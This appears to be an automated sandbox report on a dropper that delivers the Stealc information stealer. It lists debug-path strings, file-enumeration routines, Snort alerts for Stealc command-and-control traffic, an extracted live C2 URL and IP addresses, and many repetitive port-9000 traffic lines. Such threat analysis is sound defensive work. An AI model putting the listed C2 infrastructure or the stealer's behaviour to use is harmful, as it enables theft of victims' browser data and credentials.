Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1889183698.000000006C8B7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2140800122.000000006CE97000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035836028.00000240F7970000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IIDHJDGCGD.exe, 00000017.00000002.2969185171.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, IIDHJDGCGD.exe, 00000017.00000000.2476318454.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, tiktok[1].exe.1.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: nss3.pdb source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C7B261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C7B261E

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File opened: C:\Users\user\AppData\Local\Temp\u5c4.2	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
